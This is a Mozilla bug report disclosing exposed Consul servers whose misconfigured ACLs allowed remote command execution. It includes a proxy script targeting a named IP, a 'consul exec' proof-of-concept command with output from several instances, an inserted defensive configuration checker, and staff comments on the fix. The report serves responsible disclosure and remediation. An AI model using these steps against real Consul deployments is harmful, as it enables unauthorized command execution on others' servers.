Closed
Bug 1308779
Opened 9 years ago
Closed 9 years ago
Exposed consul server and RCE issue
Categories
(Infrastructure & Operations :: Infrastructure: Other, task)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: kenney_lu, Unassigned)
Details
(Keywords: reporter-external, sec-moderate, wsec-injection)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Steps to reproduce:
Hi there,
I found that several consul servers are exposed on the internet.
public.consul.stage.us-east-1.nubis-lab.nubis.allizom.org
public.consul.prod.us-west-2.nubis-training-2016.nubis.allizom.org
public.consul.admin.us-west-2.nubis-lab.nubis.allizom.org
public.consul.admin.us-east-1.nubis-lab.nubis.allizom.org
public.consul.stage.us-west-2.nubis-training-2016.nubis.allizom.org
According to WHOIS information, I believe those servers belong to Mozilla. Although public consul servers are not a big problem by themselves, it seems the ACL rule is incorrect: I can easily bypass it and execute any command with the consul account's privileges on every server, or on a specific one. Please fix it to avoid being hacked.
How to reproduce:
1. Prepare a simple Python script that proxies HTTP to HTTPS and run it as a proxy server
----------------------------------------------------------------
#!/usr/bin/env python
# Plain-HTTP listener on port 80 that forwards every connection, over TLS,
# to the exposed Consul HTTP API. The consul CLI can then be pointed at
# 127.0.0.1: an http:// address with no port defaults to port 80.
import tornado.ioloop
import maproxy.proxyserver

# Upstream target: the public Consul endpoint from the report, TLS on 443.
server = maproxy.proxyserver.ProxyServer('52.202.226.93', 443,
                                         server_ssl_options=True)
server.listen(80)  # binding port 80 needs root or CAP_NET_BIND_SERVICE
tornado.ioloop.IOLoop.instance().start()
----------------------------------------------------------------
2. Execute command via consul
> consul exec --prefix="_test" -http-addr=127.0.0.1 "uname -a"
3. The command will be executed and show all results
Reference:
https://github.com/hashicorp/consul/issues/1238
Actual results:
> consul exec --prefix="_test" -http-addr=127.0.0.1 "uname -a"
==> i-296c1a18: finished with exit code 0
i-296c1a18: Linux ip-10-162-2-104 3.13.0-93-generic #140-Ubuntu SMP Mon Jul 18 21:21:05 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-296c1a18:
==> i-3a92a72d: finished with exit code 0
i-3a92a72d: Linux ip-10-162-2-57 4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-3a92a72d:
==> i-ca0ddfdc: finished with exit code 0
i-ca0ddfdc: Linux ip-10-162-2-143 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-ca0ddfdc:
==> i-d0d3e0c6: finished with exit code 0
i-d0d3e0c6: Linux ip-10-162-2-170 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-d0d3e0c6:
==> i-d720b2c1: finished with exit code 0
i-d720b2c1: Linux ip-10-162-2-74 4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-d720b2c1:
==> i-e29e80d3: finished with exit code 0
i-e29e80d3: Linux ip-10-162-2-105 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-e29e80d3:
==> i-e44137d5: finished with exit code 0
i-e44137d5: Linux ip-10-162-2-16 4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
i-e44137d5:
Expected results:
Avoid public consul server or set ACL correctly.
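The report shows the exposure but does not say how to tell, from the agent itself, whether the remote-exec path is open. The following is an added example, not part of the bug report and not Consul's own tooling: it parses the JSON a Consul agent returns for GET /v1/agent/self and flags the three settings that together make `consul exec` usable by anyone who can reach the HTTP API. The field names it looks for and both sample payloads are assumptions labelled in the code; the hosts named in the report were not queried.

```python
"""Added example (not from the bug report): triage the JSON a Consul agent
returns for GET /v1/agent/self and flag the settings that together make
`consul exec` usable by anyone who can reach the HTTP API.

Assumptions, stated because the report does not give them:
  * Field names (Config / DebugConfig, ClientAddr / ClientAddrs,
    ACLDefaultPolicy, DisableRemoteExec) are the ones 0.7-era and 1.x
    agents emit; if a key is absent the check reports "unknown", never "ok".
  * The two sample payloads below are constructed for the example, not
    captured from the hosts named in the report.
"""
import json
from typing import Any, List, Optional

# Constructed sample: HTTP API bound to every interface, no ACL enforcement,
# remote exec still enabled (the state the report describes).
EXPOSED_AGENT_SELF = json.dumps({
    "Config": {
        "Datacenter": "us-east-1",
        "NodeName": "i-0000deadbeef",
        "Server": True,
        "Version": "0.7.0",
        "ClientAddr": "0.0.0.0",
        "ACLDefaultPolicy": "allow",
        "DisableRemoteExec": False,
    },
    "Member": {"Name": "i-0000deadbeef", "Addr": "10.0.0.10"},
})

# Constructed sample: the same agent after hardening.
HARDENED_AGENT_SELF = json.dumps({
    "Config": {
        "Datacenter": "us-east-1",
        "NodeName": "i-0000deadbeef",
        "Server": True,
        "Version": "0.7.0",
        "ClientAddr": "127.0.0.1",
        "ACLDefaultPolicy": "deny",
        "DisableRemoteExec": True,
    },
    "Member": {"Name": "i-0000deadbeef", "Addr": "10.0.0.10"},
})

# Bind addresses that expose the API on every interface.
WILDCARD_BINDS = {"0.0.0.0", "::", "[::]"}


def _lookup(doc: Any, *paths: str) -> Optional[Any]:
    """Return the value under the first dotted key path that exists."""
    for path in paths:
        node = doc
        for key in path.split("."):
            if not isinstance(node, dict) or key not in node:
                node = None
                break
            node = node[key]
        if node is not None:
            return node
    return None


def assess_agent_self(raw: str) -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    doc = json.loads(raw)
    findings: List[str] = []

    bind = _lookup(doc, "Config.ClientAddr", "DebugConfig.ClientAddrs")
    binds = bind if isinstance(bind, list) else [bind]
    if bind is None:
        findings.append("unknown: client bind address not present")
    elif any(b in WILDCARD_BINDS for b in binds):
        findings.append("bind: HTTP API listens on all interfaces")

    policy = _lookup(doc, "Config.ACLDefaultPolicy",
                     "DebugConfig.ACLDefaultPolicy")
    if policy is None:
        findings.append("unknown: ACL default policy not present")
    elif policy == "allow":
        findings.append("acl: default policy is allow; anonymous requests succeed")

    rexec = _lookup(doc, "Config.DisableRemoteExec",
                    "DebugConfig.DisableRemoteExec")
    if rexec is None:
        findings.append("unknown: DisableRemoteExec not present")
    elif rexec is False:
        findings.append("rexec: remote exec enabled; consul exec jobs are accepted")

    return findings


def remote_exec_exploitable(raw: str) -> bool:
    """True when exec is enabled and ACLs do not gate it (the report's case)."""
    tags = {f.split(":", 1)[0] for f in assess_agent_self(raw)}
    return "rexec" in tags and "acl" in tags


if __name__ == "__main__":
    for name, payload in (("exposed", EXPOSED_AGENT_SELF),
                          ("hardened", HARDENED_AGENT_SELF)):
        print(name, remote_exec_exploitable(payload), assess_agent_self(payload))
```

Against a live agent, feed the body of `curl -s http://<host>:8500/v1/agent/self` to `assess_agent_self`. The three findings map to the three fixes: bind the HTTP API to localhost or a private interface, run ACLs with a default-deny policy (`consul exec` is coordinated through the `_rexec` KV prefix, so a policy with no write rule for that prefix closes it), and set `disable_remote_exec`, which Consul 0.8.0 and later default to true. A missing key is reported as unknown rather than as safe, because an agent of a version this script does not recognise should be inspected, not passed.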
Updated•9 years ago
Group: infrasec
Updated•9 years ago
QA Contact: cshields → gozer
Comment 1•9 years ago
Our Consul server installations were never meant/designed to be publicly-accessible.
However, for convenience, we have made them available in these 2 accounts, for what was meant to be a short time, on purpose.
Thanks for finding this out and pointing it out. I'll be closing them off shortly, and it's worthwhile pointing out that these accounts did not hold any valuable information. Both accounts are testing/training accounts with no real applications deployed in them.
Nonetheless, I'll be looking at why we didn't close them back up sooner, and looking at a mechanism to do so in the future that's more controlled and secure.
Comment 2•9 years ago
nubis-training-2016 account has been closed up, and all publicly accessible instances have been terminated and recycled.
Comment 3•9 years ago
nubis-lab account has been closed up, and all publicly accessible instances have been terminated and recycled.
Updated•9 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Downgrading bug security groups now that the issue is triaged.
This was a very unusual incident that doesn't fit into our normal models for security issues. I'm setting sec-bounty? to ensure that the bounty review team is made aware of it. It may take them several weeks to evaluate with the Nubis team whether this issue earns a bounty; when a decision is reached, they will update the bug accordingly.
Group: infrasec
Flags: sec-bounty?
Comment 5•9 years ago
adamm to look into the security implications of this.
Flags: needinfo?(amuntner)
Updated•9 years ago
Flags: needinfo?(amuntner)
Keywords: wsec-appmisconfig
Comment 6•9 years ago
Follow on investigation is complete.
Updated•9 years ago
Group: mozilla-employee-confidential → websites-security
Updated•9 years ago
Flags: sec-bounty? → sec-bounty+
Updated•9 years ago
Group: websites-security
Updated•1 year ago
Keywords: reporter-external